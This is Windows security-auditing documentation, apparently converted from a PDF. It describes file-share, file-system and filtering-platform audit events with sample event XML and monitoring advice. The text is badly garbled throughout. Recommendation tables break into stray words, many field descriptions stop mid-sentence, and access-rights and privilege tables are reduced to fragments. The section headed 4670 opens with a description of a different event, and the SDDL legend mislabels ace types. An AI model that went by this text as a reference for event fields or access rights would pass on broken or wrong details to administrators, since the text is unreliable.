If you have critical files or folders on specific network shares, for which you need to monitor access attempts
(Success and Failure), monitor for specific Share Information\Share Name and Share
Information\Relative Target Name.
If you have domain or local accounts that should only be able to access a specific list of shared files or
folders, you can monitor for access attempts outside the allowed list.
We recommend that you monitor for these Access Request Information\Accesses rights (especially for
Failure):
WriteData (or AddFile)
AppendData (or AddSubdirectory or CreatePipeInstance)
WriteEA
DeleteChild
WriteAttributes
DELETE
WRITE_DAC
WRITE_OWNER
Audit File Share
Applies to
Windows 10
Windows Server 2016
Audit File Share allows you to audit events related to file shares: creation, deletion, modification, and access
attempts. Also, it shows failed SMB SPN checks.
There are no system access control lists (SACLs) for shares; therefore, after this setting is enabled, access to all
shares on the system will be audited.
Combined with File System auditing, File Share auditing enables you to track what content was accessed, the
source (IP address and port) of the request, and the user account that was used for the access.
Event volume:
High on file servers.
High on domain controllers because of SYSVOL network access required by Group Policy.
STRONGER STRONGER

for domain
controllers,
because it’s
important to
track deletion,
creation, and
modification
events for
network shares.
We recommend
Failure auditing
to track failed
SMB SPN checks
and failed access
attempts to
network shares.
STRONGER STRONGER

Success auditing
to track deletion,
creation,
modification, and
access attempts
to network share
objects.
We recommend
Failure auditing
to track failed
SMB SPN checks
and failed access
attempts to
network shares.

Success auditing
to track deletion,
creation,
modification and
access attempts
to network share
objects.
We recommend
Failure auditing
to track failed
SMB SPN checks
and failed access
attempts to
network shares.
Events List:
5140(S, F ): A network share object was accessed.
5142(S ): A network share object was added.
5143(S ): A network share object was modified.
5144(S ): A network share object was deleted.
5168(F ): SPN check for SMB/SMB2 failed.
5140(S, F): A network share object was accessed.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit File Share
Event Description:
This event generates every time network share
object was accessed.
This event generates once per session, when
first access attempt was made.

Event XML:
- <System>
<Level>0</Level>
<Task>12808</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ShareLocalPath">\\??\\C:\\Documents</Data>
</EventData>
</Event>

Event Versions:
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested access to network share object. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested access to network share
object.
the following:
Source Address [Type = UnicodeString]: source IP address from which access was performed.
Source Port [Type = UnicodeString]: source TCP or UDP port which was used from remote or local
machine to request the access.
0 for local access attempts.
Share Information:
Share Name [Type = UnicodeString]: the name of accessed network share. The format is:
\\*\SHARE_NAME.
Share Path [Type = UnicodeString]: the full system (NTFS ) path for accessed share. The format is: \\??
\PATH. Can be empty, for example for Share Name: \\*\IPC$.
Access Mask [Type = HexInt32]: the sum of hexadecimal values of requested access rights. See “Table 13.
File access codes.” for different hexadecimal values for access rights. Has always “0x1” value for this event.
These access rights depend on Object Type. Has always “ReadData (or ListDirectory)” value for this
event.

For 5140(S, F ): A network share object was accessed.
If you have high-value computers for which you need to monitor all access to all shares or specific shares
(“Share Name”), monitor this event. For example, you could monitor share C$ on domain controllers.
Monitor this event if the Network Information\Source Address is not from your internal IP range.
Monitor this event if the Network Information\Source Address should not be able to connect with the
specific computer (Computer:).
If you need to monitor access attempts to local shares from a specific IP address (“Network
Information\Source Address”), use this event.
If you need to monitor for specific Access Types (for example, ReadData or WriteData), for all or specific
shares (“Share Name”), monitor this event for the “Access Type.”
5142(S): A network share object was added.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates every time network share
object was added.

Event XML:
- <System>
<Level>0</Level>
<Task>12808</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ShareLocalPath">C:\\Documents</Data>
</EventData>
</Event>

Minimum OS Version: Windows Server 2008 R2, Windows 7.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “add network share object” operation. Event
Account Name [Type = UnicodeString]: the name of the account that requested the “add network share
the following:
Share Information:
Share Name [Type = UnicodeString]: the name of the added share object. The format is:
\\*\SHARE_NAME.
Share Path [Type = UnicodeString]: the full system (NTFS ) path for the added share object. The format is:
\\??\PATH.

For 5142(S ): A network share object was added.
If you have high-value computers for which you need to monitor creation of new file shares, monitor this
event. For example, you could monitor domain controllers.
We recommend checking “Share Path”, because it should not point to system directories, such as
C:\Windows or C:\, or to critical local folders which contain private or high value information.
5143(S): A network share object was modified.
Applies to
Windows 10
Windows Server 2016

Event Description:
This event generates every time network share object was modified.
Event XML:
- <System>
<Level>0</Level>
<Task>12808</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ObjectType">Directory</Data>
<Data Name="OldRemark">N/A</Data>
<Data Name="NewRemark">N/A</Data>
<Data Name="OldMaxUsers">0xffffffff</Data>
<Data Name="NewMaxUsers">0xffffffff</Data>
<Data Name="OldShareFlags">0x800</Data>
<Data Name="NewShareFlags">0x800</Data>
<Data Name="OldSD">O:S-1-5-21-3457937927-2839227994-823803824-1104G:DAD:(A;OICI;FA;;;BA)(A;OICI;FA;;;WD)
</Data>
<Data Name="NewSD">O:BAG:DAD:(D;;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICI;FA;;;WD)
(A;OICI;FA;;;BA)</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “modify network share object” operation. Event
Account Name [Type = UnicodeString]: the name of the account that requested the “modify network share
the following:
Share Information:
Object Type [Type = UnicodeString]: The type of an object that was modified. Always “Directory” for this
event.
Share Name [Type = UnicodeString]: the name of the modified share object. The format is:
\\*\SHARE_NAME
Share Path [Type = UnicodeString]: the full system (NTFS ) path for the added share object. The format is:
\\??\PATH. Can be empty, for example for Share Name: \\*\IPC$.
Old Remark [Type = UnicodeString]: the old value of network share “Comments:” field. Has “N/A” value if
it is not set.
New Remark [Type = UnicodeString]: the new value of network share “Comments:” field. Has “N/A” value
if it is not set.
Old MaxUsers [Type = HexInt32]: old hexadecimal value of “Limit the number of simultaneous user
to:” field. Has “0xFFFFFFFF” value if the number of connections is unlimited.
New Maxusers [Type = HexInt32]: new hexadecimal value of “Limit the number of simultaneous user
to:” field. Has “0xFFFFFFFF” value if the number of connections is unlimited.
Old ShareFlags [Type = HexInt32]: old hexadecimal value of “Offline Settings” caching settings window
flags.
New ShareFlags [Type = HexInt32]: new hexadecimal value of “Offline Settings” caching settings window
flags.
Old SD [Type = UnicodeString]: the old Security Descriptor Definition Language (SDDL ) value for network
share security descriptor.
New SD [Type = UnicodeString]: the new Security Descriptor Definition Language (SDDL ) value for
network share security descriptor.
Example:
in the table below:

Windows 2000

operators

administrators

controllers
G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
entry_type:
“D” - DACL
“S” - SACL
inheritance_flags:
ace_type:
"D" - ACCESS DENIED
"AU" - SYSTEM AUDIT
"A" - SYSTEM ALARM
ace_flags:
ACE.


rights
"KX" KEY EXECUTE
object_guid: N/A

For 5143(S ): A network share object was modified.
If you have high-value computers for which you need to monitor all modifications to all shares or specific
shares (“Share Name”), monitor this event. For example, you could monitor all changes to the SYSVOL share
on domain controllers.
5144(S): A network share object was deleted.
Applies to
Windows 10
Windows Server 2016
Event Description:
This event generates every time a network
share object is deleted.

Event XML:
- <System>
<Level>0</Level>
<Task>12808</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “delete network share object” operation. Event
Account Name [Type = UnicodeString]: the name of the account that requested the “delete network share
the following:
Share Information:
Share Name [Type = UnicodeString]: the name of the deleted share object. The format is:
\\*\SHARE_NAME
Share Path [Type = UnicodeString]: the full system (NTFS ) path for the deleted share object. The format is:
\\??\PATH.

For 5144(S ): A network share object was deleted.
If you have critical network shares for which you need to monitor all changes (especially, the deletion of that
share), monitor for specific “Share Information\Share Name”.
If you have high-value computers for which you need to monitor all changes (especially, deletion of file
shares), monitor for all 5144 events on these computers. For example, you could monitor file shares on
domain controllers.
5168(F): SPN check for SMB/SMB2 failed.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit File
Share
Event Description:
This event generates when
SMB SPN check fails.
It often happens because of
NTLMv1 or LM protocols
usage from client side when
“Microsoft Network Server:
Server SPN target name
validation level” group policy
set to “Require from client”
on server side. SPN only
sent to server when
NTLMv2 or Kerberos
protocols are used, and after
that SPN can be validated.
Event XML:
- <System>
<Level>0</Level>
<Task>12808</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="SubjectLogonId">0xd0cd4</Data>
<Data Name="SpnName">N/A</Data>
<Data Name="ErrorCode">0xc0000022</Data>
<Data Name="ServerNames">CONTOSO;contoso.local;DC01.contoso.local;DC01;LocalHost;</Data>
<Data Name="ConfiguredNames">N/A</Data>
<Data Name="IpAddresses">127.0.0.1;::1;10.0.0.10;;fe80::31ea:6c3c:f40d:1973;;fe80::5efe:10.0.0.10;</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account for which SPN check operation was failed. Event Viewer
Account Name [Type = UnicodeString]: the name of the account for which SPN check operation was
failed.
the following:
SPN:
SPN Name [Type = UnicodeString]: SPN which was used to access the server. If SPN was not provided, then
the value will be “N/A”.
Error Code [Type = HexInt32]: hexadecimal error code, for example “0xC0000022” =
STATUS_ACCESS_DENIED. You can find description for all SMB error codes here:
https://msdn.microsoft.com/library/ee441884.aspx.
Server Information:
Server Names [Type = UnicodeString]: information about possible server names to use to access the target
server (NETBIOS, DNS, localhost, etc.).
Configured Names [Type = UnicodeString]: information about the names which were provided for
validation. If no information was provided the value will be “N/A”.
IP Addresses [Type = UnicodeString]: information about possible IP addresses to use to access the target
server (IPv4, IPv6).

For 5168(F ): SPN check for SMB/SMB2 failed.
We recommend monitoring for any 5168 event, because it can be a sign of a configuration issue or a malicious
authentication attempt.
Audit File System
Applies to
Windows 10
Windows Server 2016
Audit File System determines whether the operating system generates audit events when users attempt to
access file system objects.
Audit events are generated only for objects that have configured system access control lists (SACLs), and only
if the type of access requested (such as Write, Read, or Modify) and the account making the request match the
settings in the SACL.
If success auditing is enabled, an audit entry is generated each time any account successfully accesses a file
system object that has a matching SACL. If failure auditing is enabled, an audit entry is generated each time
any user unsuccessfully attempts to access a file system object that has a matching SACL.
These events are essential for tracking activity for file objects that are sensitive or valuable and require extra
monitoring.
Event volume: Varies, depending on how file system SACLs are configured.
No audit events are generated for the default file system SACLs.
This subcategory allows you to audit user attempts to access file system objects, file system object deletion
and permissions change operations and hard link creation actions.
Only one event, “4658: The handle to an object was closed,” depends on the Audit Handle Manipulation
subcategory (Success auditing must be enabled). All other events generate without any additional
configuration.

Domain IF IF IF IF We strongly
Controller recommend that
you develop a
File System
Security
Monitoring
policy and define
appropriate
SACLs for file
system objects
for different
operating
system
templates and
roles. Do not
enable this
subcategory if
you have not
planned how to
use and analyze
the collected
information. It is
also important
to delete non-
effective, excess
SACLs.
Otherwise the
auditing log will
be overloaded
with useless
information.
Failure events
can show you
unsuccessful
attempts to
access specific
file system
objects.
Consider
enabling this
subcategory for
critical
computers first,
after you
develop a File
System Security
Monitoring
policy for them.
Member Server IF IF IF IF
Workstation IF IF IF IF
Events List:
4658(S ): The handle to an object was closed.
4660(S ): An object was deleted.
4663(S ): An attempt was made to access an object.
4664(S ): An attempt was made to create a hard link.
4985(S ): The state of a transaction has changed.
5051(-): A file was virtualized.
4670(S ): Permissions on an object were changed.
Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit Kernel Object, Audit Registry, and Audit Removable Storage
Event Description:
This event indicates that specific access was requested for an object. The object could be a file system, kernel, or
registry object, or a file system object on removable storage or a device.
If access was declined, a Failure event is generated.
This event generates only if the object’s SACL has the required ACE to handle the use of specific access rights.
This event shows that access was requested, and the results of the request, but it doesn’t show that the operation
was performed. To see that the operation was performed, check “4663(S ): An attempt was made to access an
object.”
Event XML:
- <System>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ObjectServer">Security</Data>
<Data Name="ObjectName">C:\\Documents\\HBI Data.txt</Data>
<Data Name="AccessList">%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424</Data>
<Data Name="AccessReason">%%1538: %%1804 %%1541: %%1809 %%4416: %%1809 %%4417: %%1809 %%4418: %%1802 D:
(D;;LC;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4419: %%1809 %%4420: %%1809 %%4423: %%1811 D:
(A;OICI;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4424: %%1809</Data>
<Data Name="AccessMask">0x12019f</Data>
<Data Name="ResourceAttributes">S:AI(RA;ID;;;;WD;("Impact\_MS",TI,0x10020,3000))</Data>
</EventData>
</Event>

Event Versions:
Added “Resource Attributes” field.
Added “Access Reasons” field.
Field Descriptions:
Subject:
event.
the following:
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Object Type [Type = UnicodeString]: The type of an object that was accessed during the operation.

Object Name [Type = UnicodeString]: name and other identifying information for the object for which
access was requested. For example, for a file, the path would be included.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you
correlate this event with other events that might contain the same Handle ID, for example, “4663(S ): An
attempt was made to access an object.” This parameter might not be captured in the event, and in that case
appears as “0x0”.
Resource Attributes [Type = UnicodeString] [Version 1]: attributes associated with the object. For some
objects, the field does not apply and “-“ is displayed.
For example, for a file, the following might be displayed: S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))
Impact_MS: Resource Property ID.
3000: Recourse Property Value.
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the access was
requested. Process ID (PID ) is a number used by the operating system to uniquely identify an active process.
To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):
with other events that might contain the same Transaction ID, such as “4660(S ): An object was deleted.”
0000-000000000000}”.
Accesses [Type = UnicodeString]: the list of access rights which were requested by Subject\Security ID. These
access rights depend on Object Type. The following table contains information about the most common access
rights for file system objects. Access rights for registry objects are often similar to file system objects, but the
table contains a few notes about how they vary.
HEXADECIMAL VALUE,
(For registry objects, this is “Query key a directory object, the right to read the
value.”) corresponding directory data.
directory.
(For registry objects, this is “Set key object, the right to create a file in the
value.”) directory (FILE_ADD_FILE).
HEXADECIMAL VALUE,


(For registry objects, this is “Enumerate %%4419 attributes.
sub-keys.”)

%%4420 attributes.

%%4421 right to execute the file. This access right
given to scripts may cause the script to
be executable, depending on the script
interpreter.
are assigned the


%%4423

%%4424

%%1537

%%1538 object's security descriptor, not including
the information in the system access
control list (SACL).

HEXADECIMAL VALUE,


state. Some object types do not support
this access right.

Table 14. File System objects access rights.
Access Reasons [Type = UnicodeString] [Version 1]: the list of access check results. The format of this
varies, depending on the object. For kernel objects, this field does not apply.
Access Mask [Type = HexInt32]: hexadecimal mask for the requested or performed operation. For more
information, see the preceding table.
Privileges Used for Access Check [Type = UnicodeString]: the list of user privileges which were used during
the operation, for example, SeBackupPrivilege. This parameter might not be captured in the event, and in that
case appears as “-”. See full list of user privileges in the table below:

a process.

operations.
held:
READ_CONTROL
FILE_GENERIC_READ
FILE_TRAVERSE




APIs.

account.
components.

a process.
interface.
to a process.
users.
driver.

memory.
computer account.
controllers.

defragmentation.

processes.

network request.

held:
WRITE_DAC
WRITE_OWNER
FILE_GENERIC_WRITE
FILE_ADD_FILE
DELETE
an object.

security event log.
synchronization.
information.

processes.
clock.



a terminal device.
Object Types.

For kernel objects, this event and other auditing events have little to no security relevance and are hard to parse or
analyze. There is no recommendation for auditing them, unless you know exactly what you need to monitor at the
Kernel objects level.
For other types of objects, the following recommendations apply.
If Object Name is a sensitive or critical object for which you need to monitor any access attempt, monitor
all 4656 events.
If Object Name is a sensitive or critical object for which you need to monitor specific access attempts (for
example, only write actions), monitor for all 4656 events with the corresponding Access Request
Information\Accesses values.
If you need to monitor files and folders with specific Resource Attribute values, monitor for all 4656 events
with specific Resource Attributes field values.
For file system objects, we recommend that you monitor these Access Request Information\Accesses
rights (especially for Failure events):
WriteEA
DeleteChild
WriteAttributes
DELETE
WRITE_DAC
WRITE_OWNER
4658(S): The handle to an object was closed.
Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit
Handle Manipulation, Audit Kernel Object,
Audit Registry, and Audit Removable Storage
Event Description:
This event generates when the handle to an
object is closed. The object could be a file
system, kernel, or registry object, or a file
system object on removable storage or a
device.
enabled for Audit Handle Manipulation
subcategory.
Typically this event is needed if you need to
know how long the handle to the object was
open. Otherwise, it might not have any security
relevance.
Event XML:
- <System>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="HandleId">0x18a8</Data>
<Data Name="ProcessId">0xef0</Data>
<Data Name="ProcessName">C:\\Windows\\explorer.exe</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “close object’s handle” operation. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that requested the “close object’s handle”
operation.
the following:
Object:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that requested that the handle be
closed. Process ID (PID ) is a number used by the operating system to uniquely identify an active process. To

For 4658(S ): The handle to an object was closed.
Typically this event has little to no security relevance and is hard to parse or analyze. There is no
recommendation for this event, unless you know exactly what you need to monitor with it.
This event can be used to track all actions or operations related to a specific object handle.
4660(S): An object was deleted.
Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit Kernel
Object, and Audit Registry
Event Description:
This event generates when an object was
deleted. The object could be a file system,
kernel, or registry object.
This event generates only if “Delete" auditing is
set in object’s SACL.
This event doesn’t contain the name of the
deleted object (only the Handle ID ). It is better
to use “4663(S ): An attempt was made to
access an object” with DELETE access to track
object deletion.
The advantage of this event is that it’s
generated only during real delete operations. In
contrast, “4663(S ): An attempt was made to
access an object” also generates during other
actions, such as object renaming.
Event XML:
- <System>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
operation.
the following:
Object:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that deleted the object. Process ID (PID )
is a number used by the operating system to uniquely identify an active process. To see the PID for a specific
with other events that might contain the same Transaction ID, such as “4656(S, F ): A handle to an object
was requested.”
0000-000000000000}”.
For 4660(S ): An object was deleted.
This event doesn’t contains the name of deleted object (only Handle ID ). It is better to use “4663(S ): An
attempt was made to access an object.” events with DELETE access to track object deletion actions.
For kernel objects, this event and other auditing events have little to no security relevance and are hard to
parse or analyze. There is no recommendation for auditing them, unless you know exactly what you need to
monitor at the Kernel objects level.
4663(S): An attempt was made to access an object.
Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System,
Audit Kernel Object, Audit Registry,
and Audit Removable Storage
Event Description:
This event indicates that a specific
operation was performed on an
object. The object could be a file
system, kernel, or registry object, or
a file system object on removable
storage or a device.
This event generates only if object’s
SACL has required ACE to handle
specific access right use.
The main difference with “4656: A
handle to an object was requested.”
event is that 4663 shows that
access right was used instead of
just requested and 4663 doesn’t
have Failure events.

Security Monitoring
Event XML:
- <System>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="HandleId">0x1bc</Data>
<Data Name="AccessList">%%4417 %%4418</Data>
</EventData>
</Event>

Event Versions:
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made an attempt to access an object. Event Viewer automatically
the event.
Account Name [Type = UnicodeString]: the name of the account that made an attempt to access an object.
the following:
Object:
Object Type [Type = UnicodeString]: The type of object that was accessed during the operation.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can be used for
correlation with other events, for example with Handle ID field in “4656(S, F ): A handle to an object was
requested.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process ID [Type = Pointer]: hexadecimal Process ID of the process that accessed the object. Process ID
Accesses [Type = UnicodeString]: the list of access rights which were used by Subject\Security ID. These
HEX VALUE,
directory.


sub-keys.”)

%%4420 attributes.

interpreter.
are assigned the

HEX VALUE,

%%4423

%%4424

%%1537




this access right.


For 4663(S ): An attempt was made to access an object.
If you have critical file system objects for which you need to monitor all access attempts, monitor this event
for Object Name.
If you have critical file system objects for which you need to monitor certain access attempts (for example,
write actions), monitor this event for Object Name in relation to Access Request Information\Accesses.
If you have file system objects with specific attributes, for which you need to monitor access attempts,
monitor this event for Resource Attributes.
If Object Name is a sensitive or critical registry key for which you need to monitor specific access attempts
(for example, only write actions), monitor for all 4663 events with the corresponding Access Request
Information\Accesses.
For file system objects, we recommend that you monitor for these Access Request Information\Accesses
rights:
WriteEA
DeleteChild
WriteAttributes
DELETE
WRITE_DAC
WRITE_OWNER
4664(S): An attempt was made to create a hard link.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit File System
Event Description:
This event generates when an NTFS hard link
was successfully created.

Event XML:
- <System>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="FileName">C:\\notepad.exe</Data>
<Data Name="LinkName">C:\\Docs\\My.exe</Data>
</EventData>
</Event>
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made an attempt to create the hard link. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that made an attempt to create the hard
link.
the following:
Link Information:
File Name [Type = UnicodeString]: the name of a file or folder that new hard link refers to.
Link Name [Type = UnicodeString]: full path name with new hard link file name.
0000-000000000000}”.

For 4664(S ): An attempt was made to create a hard link.
We recommend monitoring for any 4664 event, because this action is not typical for normal operating system
behavior and can be a sign of malicious activity.
4985(S): The state of a transaction has changed.
Applies to
Windows 10
Windows Server 2016
Non Sensitive Privilege Use, Audit Other
Privilege Use Events, and Audit Sensitive
Privilege Use
Event Description:
This is an informational event from file
system Transaction Manager.

event.
Event XML:
- <System>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TransactionId">{17EF5E21-5E2C-11E5-810F-00155D987005}</Data>
<Data Name="NewState">52</Data>
<Data Name="ResourceManager">{5F5ED427-FCCA-11E3-BD73-B54AB417B853}</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account through which the state of the transaction was changed. Event Viewer
Account Name [Type = UnicodeString]: the name of the account that changed the state of the transaction.
following:
Transaction Information:
RM Transaction ID [Type = GUID ]: unique GUID of the transaction. This field can help you correlate this event
with other events that might contain the same Transaction ID, such as “4656(S, F ): A handle to an object was
requested.”
New State [Type = UInt32]: identifier of the new state of the transaction.
Resource Manager [Type = GUID ]: unique GUID -Identifier of the Resource Manager which associated
with this transaction.
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the state of the
transaction was changed. Process ID (PID ) is a number used by the operating system to uniquely identify an
active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID
column):

For 4985(S ): The state of a transaction has changed.
This event typically has no security relevance and used for Transaction Manager troubleshooting.
5051(-): A file was virtualized.
Applies to
Windows 10
Windows Server 2016
This event should be generated when file was virtualized using LUAFV.
This event occurs very rarely during standard LUAFV file virtualization.
Subcategory: Audit File System
Event Schema:
A file was virtualized.
Subject:
Security ID:%1%
Account Name:%2
Account Domain:%3
Logon ID:%4
Object:
File Name:%5
Virtual File Name:%6
Process ID:%7
Process Name%8

Event Versions: 0.

4670(S): Permissions on an object were changed.
Applies to
Windows 10
Windows Server 2016
Registry, Audit Authentication Policy Change,
and Audit Authorization Policy Change
Event Description:
This event generates when the permissions for
an object are changed. The object could be a
file system, registry, or security token object.
This event does not generate if the SACL
(Auditing ACL ) was changed.
Before this event can generate, certain ACEs
might need to be set in the object’s SACL. For
example, for a file system object, it generates
only if “Change Permissions" and/or "Take
Ownership” are set in the object’s SACL. For a
registry key, it generates only if “Write DAC"
and/or "Write Owner” are set in the object’s
SACL.

Event XML:
- <System>
<Level>0</Level>
<Task>13570</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="ObjectName">C:\\Documents\\netcat-1.11</Data>
<Data Name="HandleId">0x3f0</Data>
<Data Name="OldSd">D:AI(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)(A;OICIID;FA;;;S-1-5-21-
3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)</Data>
<Data Name="NewSd">D:ARAI(A;OICI;FA;;;WD)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)
(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)</Data>
<Data Name="ProcessId">0xdb0</Data>
<Data Name="ProcessName">C:\\Windows\\System32\\dllhost.exe</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that requested the “change object’s permissions” operation. Event
Account Name [Type = UnicodeString]: the name of the account that requested the “change object’s
permissions” operation.
the following:
Object:
permissions were changed. For example, for a file, the path would be included. For Token objects, this field
typically equals “-“.
Process:
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the permissions were
changed. Process ID (PID ) is a number used by the operating system to uniquely identify an active process.
Permissions Change:
Original Security Descriptor [Type = UnicodeString]: the old Security Descriptor Definition Language
(SDDL ) value for the object.
New Security Descriptor [Type = UnicodeString]: the new Security Descriptor Definition Language
Example:
in the table below:

Windows 2000


operators

administrators

controllers
G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
entry_type:
“D” - DACL
“S” - SACL
inheritance_flags:
ace_type:
"D" - ACCESS DENIED
"AU" - SYSTEM AUDIT
"A" - SYSTEM ALARM
ace_flags:
ACE.

rights

"KX" KEY EXECUTE
object_guid: N/A

For 4670(S ): Permissions on an object were changed.
For token objects, this is typically an informational event, and at the same time it is difficult to identify which token's
permission were changed. For token objects, there are no monitoring recommendations for this event in this
document.
For file system and registry objects, the following recommendations apply.
If you have critical registry objects for which you need to monitor all modifications (especially permissions
changes and owner changes), monitor for the specific Object\Object Name.
If you have high-value computers for which you need to monitor all changes for all or specific objects (for
example, file system or registry objects), monitor for all 4670 events on these computers. For example, you
could monitor the ntds.dit file on domain controllers.
Applies to
Windows 10
Windows Server 2016
Audit Filtering Platform Connection determines whether the operating system generates audit events when
connections are allowed or blocked by the Windows Filtering Platform.
Windows Filtering Platform (WFP ) enables independent software vendors (ISVs) to filter and modify TCP/IP
packets, monitor or authorize connections, filter Internet Protocol security (IPsec)-protected traffic, and filter
remote procedure calls (RPCs).
This subcategory contains Windows Filtering Platform events about blocked and allowed connections, blocked
and allowed port bindings, blocked and allowed port listening actions, and blocked to accept incoming
connections applications.
Event volume: High.
STRONGER STRONGER
STRONGER STRONGER
Domain No Yes IF Yes Success auditing

Controller for this
subcategory
typically
generates a very
high volume of
events, for
example, one
event for every
connection that
was made to the
system. It is
much more
important to
audit Failure
events (blocked
connections, for
example). For
recommendation
s for using and
analyzing the
collected
information, see
the Security
Monitoring
Recommendatio
ns sections.
IF - Enable
Success audit in
case you need to
monitor
successful
outbound or
inbound
connections to
and from
untrusted IP
addresses on
high value
computers or
devices.
STRONGER STRONGER
Member Server No Yes IF Yes Success auditing

for this
subcategory
typically
generates a very
high volume of
events, for
example, one
event for every
connection that
was made to the
system. It is
much more
important to
audit Failure
events (blocked
connections, for
example). For
recommendation
s for using and
analyzing the
collected
information, see
the Security
Monitoring
Recommendatio
ns sections.
IF - Enable
Success audit in
case you need to
monitor
successful
outbound or
inbound
connections to
and from
untrusted IP
addresses on
high value
computers or
devices.
STRONGER STRONGER
Workstation No Yes IF Yes Success auditing

for this
subcategory
typically
generates a very
high volume of
events, for
example, one
event for every
connection that
was made to the
system. It is
much more
important to
audit Failure
events (blocked
connections, for
example). For
recommendation
s for using and
analyzing the
collected
information, see
the Security
Monitoring
Recommendatio
ns sections.
IF - Enable
Success audit in
case you need to
monitor
successful
outbound or
inbound
connections to
and from
untrusted IP
addresses on
high value
computers or
devices.
Events List:
5031(F ): The Windows Firewall Service blocked an application from accepting incoming connections on
the network.
5150(-): The Windows Filtering Platform blocked a packet.
5151(-): A more restrictive Windows Filtering Platform filter has blocked a packet.
5154(S ): The Windows Filtering Platform has permitted an application or service to listen on a port for
incoming connections.
5155(F ): The Windows Filtering Platform has blocked an application or service from listening on a port for
5156(S ): The Windows Filtering Platform has permitted a connection.
5157(F ): The Windows Filtering Platform has blocked a connection.
5158(S ): The Windows Filtering Platform has permitted a bind to a local port.
5159(F ): The Windows Filtering Platform has blocked a bind to a local port.
5031(F): The Windows Firewall Service blocked an
application from accepting incoming connections on
the network.
Applies to
Windows 10
Windows Server 2016
Windows Server 2012
Subcategory: Audit Filtering Platform
Connection
Event Description:
This event generates when an application was
blocked from accepting incoming connections
on the network by Windows Filtering Platform.
If you don’t have any firewall rules (Allow or
Deny) in Windows Firewall for specific
applications, you will get this event from
Windows Filtering Platform layer, because by
default this layer is denying any incoming
connections.
Event XML:
- <System>
<Level>0</Level>
<Task>12810</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="Profiles">Domain</Data>
<Data Name="Application">C:\\documents\\listener.exe</Data>
</EventData>
</Event>

Event Versions: 0.
Field Descriptions:
Profiles [Type = UnicodeString]: network profile using which application was blocked. Possible values:
Domain
Public
Private
Application [Type = UnicodeString]: full path and file name of executable file for blocked application.

For 5031(F ): The Windows Firewall Service blocked an application from accepting incoming connections on the
network.
You can use this event to detect applications for which no Windows Firewall rules were created.
